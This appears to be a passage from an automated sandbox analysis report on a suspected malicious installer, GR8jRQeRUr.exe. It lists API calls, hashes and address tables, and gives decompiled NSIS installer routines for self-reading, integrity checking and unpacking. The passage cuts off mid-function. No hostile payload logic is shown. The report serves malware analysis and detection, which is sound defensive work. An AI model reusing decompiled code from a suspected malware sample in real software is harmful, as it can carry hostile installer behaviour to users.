                                                                                                                                                                          0x00403e86
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403e8b
                                                                                                                                                                          0x00403df3
                                                                                                                                                                          0x00403df5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403d6a
                                                                                                                                                                          0x00403d6a
                                                                                                                                                                          0x00403d76
                                                                                                                                                                          0x00403d80
                                                                                                                                                                          0x00403d86
                                                                                                                                                                          0x00403d8b
                                                                                                                                                                          0x00403d9a
                                                                                                                                                                          0x00403eb8
                                                                                                                                                                          0x00403eb8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403eb8
                                                                                                                                                                          0x00403da9
                                                                                                                                                                          0x00403de4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403de4
                                                                                                                                                                          0x00403ca1
                                                                                                                                                                          0x00403ca1
                                                                                                                                                                          0x00403ca4
                                                                                                                                                                          0x00403ca6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403cb4
                                                                                                                                                                          0x00403cc6
                                                                                                                                                                          0x00403ccb
                                                                                                                                                                          0x00403cd4
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403cda
                                                                                                                                                                          0x00403cdc
                                                                                                                                                                          0x00403ce9
                                                                                                                                                                          0x00403ce9
                                                                                                                                                                          0x00403cf2
                                                                                                                                                                          0x00403cf8
                                                                                                                                                                          0x00403d20
                                                                                                                                                                          0x00403d28
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403d0a
                                                                                                                                                                          0x00403d0b
                                                                                                                                                                          0x00403d14
                                                                                                                                                                          0x00403d1a
                                                                                                                                                                          0x00403d1b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403d1b
                                                                                                                                                                          0x00403d16
                                                                                                                                                                          0x00403d18
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403d18
                                                                                                                                                                          0x00403cf8

                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0040690A: GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                                                                                                                                            • Part of subcall function 0040690A: GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                                                                                                                                          • lstrcatW.KERNEL32(1033,0042D268), ref: 00403C6D
                                                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000,00000002,74E5FAA0), ref: 00403CED
                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp,1033,0042D268,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042D268,00000000), ref: 00403D00
                                                                                                                                                                          • GetFileAttributesW.KERNEL32(Call,?,00000000,?), ref: 00403D0B
                                                                                                                                                                          • LoadImageW.USER32 ref: 00403D54
                                                                                                                                                                            • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                                                                                                                                          • RegisterClassW.USER32 ref: 00403D91
                                                                                                                                                                          • SystemParametersInfoW.USER32 ref: 00403DA9
                                                                                                                                                                          • CreateWindowExW.USER32 ref: 00403DDE
                                                                                                                                                                          • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403E14
                                                                                                                                                                          • GetClassInfoW.USER32 ref: 00403E40
                                                                                                                                                                          • GetClassInfoW.USER32 ref: 00403E4D
                                                                                                                                                                          • RegisterClassW.USER32 ref: 00403E56
                                                                                                                                                                          • DialogBoxParamW.USER32 ref: 00403E75
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                          • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                          • API String ID: 1975747703-3672744114
                                                                                                                                                                          • Opcode ID: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                          • Instruction ID: 6cc527b2f10929733706d009ff8c1d9b21e511251dd9cb17fe62514cef47010a
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5bc0c8b1d06963261e86736c564a0ba68078006fcf7539d23d4665df175b37
                                                                                                                                                                          • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040307D, Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                          			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe";
				 *0x434f0c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\GR8jRQeRUr.exe", 0x400);
				_t89 = E0040602D(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E0040653D(0x441800, _t91);
				E0040653D(0x444000, E00405E58(0x441800));
				_t50 = GetFileSize(_t89, 0);
				 *0x42aa24 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x434f14 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x40387d
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034E5( *0x434f14 + 0x1c);
						_t35 =  &_v24; // 0x40387d
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						if(E004032B4() == _v24) {
							 *0x434f10 = _t94;
							 *0x434f18 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x434f1c =  *0x434f1c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FE8(0x434f20, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034E5( *0x41ea18);
					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004034CF(0x416a18, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x434f14 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FE8( &_v44, 0x416a18, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x41ea18; // 0x162ed
							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x434f14 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x42aa24) {
							_v12 = E004069F7(_v12, 0x416a18, _t90);
						}
						 *0x41ea18 =  *0x41ea18 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}




























                                                                                                                                                                          0x00403085
                                                                                                                                                                          0x00403088
                                                                                                                                                                          0x0040308b
                                                                                                                                                                          0x0040308e
                                                                                                                                                                          0x00403094
                                                                                                                                                                          0x004030a5
                                                                                                                                                                          0x004030aa
                                                                                                                                                                          0x004030bd
                                                                                                                                                                          0x004030c2
                                                                                                                                                                          0x004030c5
                                                                                                                                                                          0x004030cb
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004030cd
                                                                                                                                                                          0x004030de
                                                                                                                                                                          0x004030ef
                                                                                                                                                                          0x004030f6
                                                                                                                                                                          0x004030fe
                                                                                                                                                                          0x00403103
                                                                                                                                                                          0x00403105
                                                                                                                                                                          0x004031f0
                                                                                                                                                                          0x004031f2
                                                                                                                                                                          0x004031fe
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403203
                                                                                                                                                                          0x00403227
                                                                                                                                                                          0x00403227
                                                                                                                                                                          0x0040322c
                                                                                                                                                                          0x00403232
                                                                                                                                                                          0x0040323d
                                                                                                                                                                          0x00403242
                                                                                                                                                                          0x00403242
                                                                                                                                                                          0x00403245
                                                                                                                                                                          0x00403246
                                                                                                                                                                          0x00403247
                                                                                                                                                                          0x00403251
                                                                                                                                                                          0x00403268
                                                                                                                                                                          0x00403270
                                                                                                                                                                          0x00403275
                                                                                                                                                                          0x00403277
                                                                                                                                                                          0x00403277
                                                                                                                                                                          0x0040327f
                                                                                                                                                                          0x0040327f
                                                                                                                                                                          0x00403282
                                                                                                                                                                          0x00403283
                                                                                                                                                                          0x00403283
                                                                                                                                                                          0x00403286
                                                                                                                                                                          0x00403288
                                                                                                                                                                          0x00403288
                                                                                                                                                                          0x00403292
                                                                                                                                                                          0x00403298
                                                                                                                                                                          0x004032a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004032ab
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403251
                                                                                                                                                                          0x0040320b
                                                                                                                                                                          0x0040321d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040310b
                                                                                                                                                                          0x00403110
                                                                                                                                                                          0x00403115
                                                                                                                                                                          0x00403119
                                                                                                                                                                          0x00403120
                                                                                                                                                                          0x00403127
                                                                                                                                                                          0x00403129
                                                                                                                                                                          0x00403129
                                                                                                                                                                          0x00403134
                                                                                                                                                                          0x0040325c
                                                                                                                                                                          0x00403253
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403253
                                                                                                                                                                          0x00403141
                                                                                                                                                                          0x004031c1
                                                                                                                                                                          0x004031c5
                                                                                                                                                                          0x004031ca
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004031c1
                                                                                                                                                                          0x0040314a
                                                                                                                                                                          0x0040314f
                                                                                                                                                                          0x00403157
                                                                                                                                                                          0x0040317d
                                                                                                                                                                          0x00403183
                                                                                                                                                                          0x0040318c
                                                                                                                                                                          0x00403192
                                                                                                                                                                          0x00403197
                                                                                                                                                                          0x0040319d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004031a7
                                                                                                                                                                          0x004031af
                                                                                                                                                                          0x004031b2
                                                                                                                                                                          0x004031b7
                                                                                                                                                                          0x004031b9
                                                                                                                                                                          0x004031b9
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004031a7
                                                                                                                                                                          0x004031cb
                                                                                                                                                                          0x004031d1
                                                                                                                                                                          0x004031dd
                                                                                                                                                                          0x004031dd
                                                                                                                                                                          0x004031e0
                                                                                                                                                                          0x004031e6
                                                                                                                                                                          0x004031e6
                                                                                                                                                                          0x004031ee
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004031ee

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040308E
                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\GR8jRQeRUr.exe,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                                                                                                                                            • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\GR8jRQeRUr.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                                                                                                                                            • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,C:\Users\user\Desktop\GR8jRQeRUr.exe,C:\Users\user\Desktop\GR8jRQeRUr.exe,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\GR8jRQeRUr.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                                                                                                                                          • API String ID: 2803837635-819038201
                                                                                                                                                                          • Opcode ID: de3a7b98d119d447b438ab8d8f6d54b50e9da780634de5a43c52504fc5311ab1
                                                                                                                                                                          • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                                                                                                                                          • Opcode Fuzzy Hash: de3a7b98d119d447b438ab8d8f6d54b50e9da780634de5a43c52504fc5311ab1
                                                                                                                                                                          • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004032B4, Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 166COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                          			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				long _t70;
				intOrPtr _t75;
				long _t76;
				intOrPtr _t77;
				void* _t78;
				int _t88;
				intOrPtr _t92;
				intOrPtr _t95;
				long _t96;
				signed int _t97;
				int _t98;
				int _t99;
				intOrPtr _t100;
				void* _t101;
				void* _t102;

				_t97 = _a16;
				_t92 = _a12;
				_v12 = _t97;
				if(_t92 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t92;
				if(_t92 == 0) {
					_v16 = 0x422a20;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034E5( *0x434f58 + _t62);
				}
				if(E004034CF( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t92 != 0) {
							if(_a16 < _t97) {
								_t97 = _a16;
							}
							if(E004034CF(_t92, _t97) != 0) {
								_v8 = _t97;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t92) {
							goto L44;
						}
						_t88 = _v12;
						while(1) {
							_t98 = _a16;
							if(_a16 >= _t88) {
								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65("5�A");
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x422a37
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x422a37
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

























                                                                                                                                                                          0x004032bf
                                                                                                                                                                          0x004032c3
                                                                                                                                                                          0x004032c6
                                                                                                                                                                          0x004032cb
                                                                                                                                                                          0x004032cd
                                                                                                                                                                          0x004032cd
                                                                                                                                                                          0x004032d4
                                                                                                                                                                          0x004032d8
                                                                                                                                                                          0x004032dd
                                                                                                                                                                          0x004032df
                                                                                                                                                                          0x004032df
                                                                                                                                                                          0x004032e6
                                                                                                                                                                          0x004032eb
                                                                                                                                                                          0x004032f6
                                                                                                                                                                          0x004032f6
                                                                                                                                                                          0x00403308
                                                                                                                                                                          0x004034bd
                                                                                                                                                                          0x004034bd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040330e
                                                                                                                                                                          0x00403312
                                                                                                                                                                          0x0040346a
                                                                                                                                                                          0x004034ad
                                                                                                                                                                          0x004034af
                                                                                                                                                                          0x004034af
                                                                                                                                                                          0x004034bb
                                                                                                                                                                          0x004034c2
                                                                                                                                                                          0x004034c5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004034bb
                                                                                                                                                                          0x0040346f
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403471
                                                                                                                                                                          0x00403474
                                                                                                                                                                          0x00403477
                                                                                                                                                                          0x0040347a
                                                                                                                                                                          0x0040347c
                                                                                                                                                                          0x0040347c
                                                                                                                                                                          0x0040348c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040349a
                                                                                                                                                                          0x00403464
                                                                                                                                                                          0x00403464
                                                                                                                                                                          0x004034bf
                                                                                                                                                                          0x004034bf
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004034bf
                                                                                                                                                                          0x0040349c
                                                                                                                                                                          0x0040349f
                                                                                                                                                                          0x004034a6
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004034a8
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403474
                                                                                                                                                                          0x0040331e
                                                                                                                                                                          0x00403320
                                                                                                                                                                          0x00403327
                                                                                                                                                                          0x0040332e
                                                                                                                                                                          0x0040332e
                                                                                                                                                                          0x00403335
                                                                                                                                                                          0x0040333d
                                                                                                                                                                          0x00403347
                                                                                                                                                                          0x0040334c
                                                                                                                                                                          0x00403354
                                                                                                                                                                          0x0040335e
                                                                                                                                                                          0x00403361
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403367
                                                                                                                                                                          0x00403367
                                                                                                                                                                          0x00403367
                                                                                                                                                                          0x0040336f
                                                                                                                                                                          0x00403371
                                                                                                                                                                          0x00403371
                                                                                                                                                                          0x00403382
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403388
                                                                                                                                                                          0x0040338b
                                                                                                                                                                          0x00403391
                                                                                                                                                                          0x00403397
                                                                                                                                                                          0x00403397
                                                                                                                                                                          0x004033a2
                                                                                                                                                                          0x004033a8
                                                                                                                                                                          0x004033ad
                                                                                                                                                                          0x004033b4
                                                                                                                                                                          0x004033b7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x004033bd
                                                                                                                                                                          0x004033c3
                                                                                                                                                                          0x004033c5
                                                                                                                                                                          0x004033ce
                                                                                                                                                                          0x004033d0
                                                                                                                                                                          0x00403401
                                                                                                                                                                          0x00403407
                                                                                                                                                                          0x00403413
                                                                                                                                                                          0x00403418
                                                                                                                                                                          0x00403418
                                                                                                                                                                          0x0040341d
                                                                                                                                                                          0x00403458
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x0040341f
                                                                                                                                                                          0x00403423
                                                                                                                                                                          0x0040343a
                                                                                                                                                                          0x0040343f
                                                                                                                                                                          0x00403442
                                                                                                                                                                          0x00403445
                                                                                                                                                                          0x00403448
                                                                                                                                                                          0x0040344c
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403452
                                                                                                                                                                          0x0040342c
                                                                                                                                                                          0x00403433
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403435
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403435
                                                                                                                                                                          0x0040341d
                                                                                                                                                                          0x00403460
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403460
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00403367

                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.404587324.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.404574105.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404597920.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404604419.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404700678.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404716938.0000000000431000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404741988.0000000000440000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404754856.0000000000442000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.404776328.000000000044C000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                          • String ID: *B$ A$ A$... %d%%$5A$7*B$}8@
                                                                                                                                                                          • API String ID: 551687249-1348874920
                                                                                                                                                                          • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                          • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                                                                                                                          • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                                                                                                                          • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040176F, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                          			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
